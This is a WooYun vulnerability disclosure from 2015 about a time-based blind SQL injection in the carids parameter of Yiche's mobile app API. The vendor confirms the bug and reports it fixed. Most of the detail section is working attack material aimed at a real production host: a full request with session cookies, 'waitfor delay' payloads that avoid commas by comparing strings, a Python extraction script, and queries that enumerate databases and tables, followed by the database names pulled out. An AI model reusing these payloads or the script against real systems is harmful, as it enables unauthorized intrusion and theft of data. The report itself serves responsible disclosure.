当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0149383

漏洞标题:易车网某处存在SQL注入漏洞(可跨25个库及所有数据)附验证脚本

相关厂商:易车

漏洞作者: 路人甲

提交时间:2015-10-26 10:57

修复时间:2015-12-10 11:00

公开时间:2015-12-10 11:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-26: 细节已通知厂商并且等待厂商处理中
2015-10-26: 厂商已经确认,细节仅向厂商公开
2015-11-05: 细节向核心白帽子及相关领域专家公开
2015-11-15: 细节向普通白帽子公开
2015-11-25: 细节向实习白帽子公开
2015-12-10: 细节向公众公开

简要描述:

易车SQL注入

详细说明:

目标:易车网官网APP
检测发现以下地方存在注入:(POST中的carids,stacked queries)

POST http://api.ycapp.yiche.com/Car/GetCarStylePropertys HTTP/1.1
Host: api.ycapp.yiche.com
Cookie: __cs_visitor=1445701271467275; __v3_cs_skey_10027=4hmi4s; a=Rw0qZ0AXX3h5; tsc=3_562ba697_562ba697_0_1
Accept-Encoding: gzip,deflate
X-Requested-With: XMLHttpRequest
Content-Length: 109
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
carids=114069,114070,114071,114018,114065,114067,114064,114066,114068,102164,102159,102163,102155,102148,102147,102152


SQLMap证据截图:

sqlmap.jpg


看了下网站被没设什么过滤或者WAF,但是SQLMAP并没跑出库名来;
一、暴数据方法
后来研究了下发现,由于这个参数中的本来就存在逗号,所以逗号会被程序脚本作为分隔符处理掉,这样就传不到数据库了,所以相当于逗号就被过滤了,也就是说注入语句中不能存在逗号。
如果是MySQL数据库的话,直接用substr(user() from 1 for 1)来替代substr(user(),1,1)即可,但是此数据库为MSSQL,只支持substring(user,1,1),必须使用逗号。
后来想了下,使用了字符串比较的方法解决,MSSQL比较字符串是一个个字符往后比ASCII,不管长度如何,只要在前N位分出大小,则停止比较。故按此原理可逐位推算出DB_NAME()等数据。如

; if(db_name()>'Y') waitfor delay '0:0:5'-- -


; if(db_name()>'YI') waitfor delay '0:0:5'-- -


不断枚举最后一位的字符即可~
Python程序如下,以跑11位的当前数据库名为例:(程序中设了个代理,如需使用,请取消)

#!/usr/bin/env python
#coding=utf8
import httplib, urllib, re, time
count = 0
user_name = ''
httpClient = None
for i in range(1,15):
a = 33
while a < 128:
try:
params = 'carids=114069;if(db_name()<\''+user_name+chr(a)+'\') waitfor delay \'0:0:5\' -- -'
headers = {"Host": "api.ycapp.yiche.com",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0",
"Accept-Encoding": "gzip,deflate",
"Accept": "*/*",
"Cookie": "__cs_visitor=1445701271467275; __v3_cs_skey_10027=4hmi4s; a=Rw0qZ0AXX3h5; tsc=3_562ba697_562ba697_0_1",
"Connection": "keep-alive",
"X-Requested-With": "XMLHttpRequest",
"Content-Type": "application/x-www-form-urlencoded",
"Content-Length": len(params)}
httpClient = httplib.HTTPConnection("192.168.1.2", 8888, timeout=30)
httpClient.request("POST", "http://api.ycapp.yiche.com/Car/GetCarStylePropertys", params, headers)
st = time.time()
response = httpClient.getresponse()

#rp = response.read()
if count == 1:
if time.time()-st > 5:
user_name = user_name + chr(a-1)
print "db_name: "+user_name
count = 0
break
else:
count = 0
else:
if time.time()-st > 5:
count = 1
a = a - 1
a = a+1

except Exception, e:
print e
finally:
if httpClient:
httpClient.close()


二、数据证明
1)当前数据库:YICHEMOBILE

;if(db_name='XXX') waitfor delay '0:0:3' -- -


(XXX按一中原理遍历)

db_name.jpg


2)所有数据库个数,共25个

carids=114069;if((select count(*) from master.dbo.sysdatabases)=25) waitfor delay '0:0:3' -- -


3)所有数据库名,这里只列出一些吧,其他的就不跑了

carids=114069;if((select name from master.dbo.sysdatabases where dbid=YYY)='XXX') waitfor delay '0:0:3' -- -


(XXX按一中原理遍历,YYY从1-25,即可遍历25个库名)
================
MASTER
TEMPDB
MODEL
MSDB
BITAUTOUSERCRM
BITAUTOBI
BITAUTOUGCMONITOR
YICHEMALLPAYMENT
MARKETINVOICE
DEALERASSISTANTSYSTEM
YICHEMOBILE
YICHEMOBILECOMMUNITY
YICHEACTIVITY
YICHEMEDIA
YICHEMOBILESUBSCRIBE
MARKETCOUPONS
......
......
================

dbs.jpg


4)我们来看下当前库YICHEMOBILE吧,共930个表

carids=114069;if((select count(*) from yichemobile.dbo.sysobjects)=930) waitfor delay '0:0:5' -- -


5)我们来看两个表名吧,其他的表及具体的数据就深入咯~

carids=114069;if((select top 1 name from yichemobile.dbo.sysdatabases)='XXX') waitfor delay '0:0:3' -- -


TABLES.jpg

漏洞证明:

修复方案:

请多指教~

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-10-26 10:59

厂商回复:

非常感谢对易车的帮助,我们尽快处理。谢谢

最新状态:

2015-10-27:已经修复了,非常感谢对易车的支持。谢谢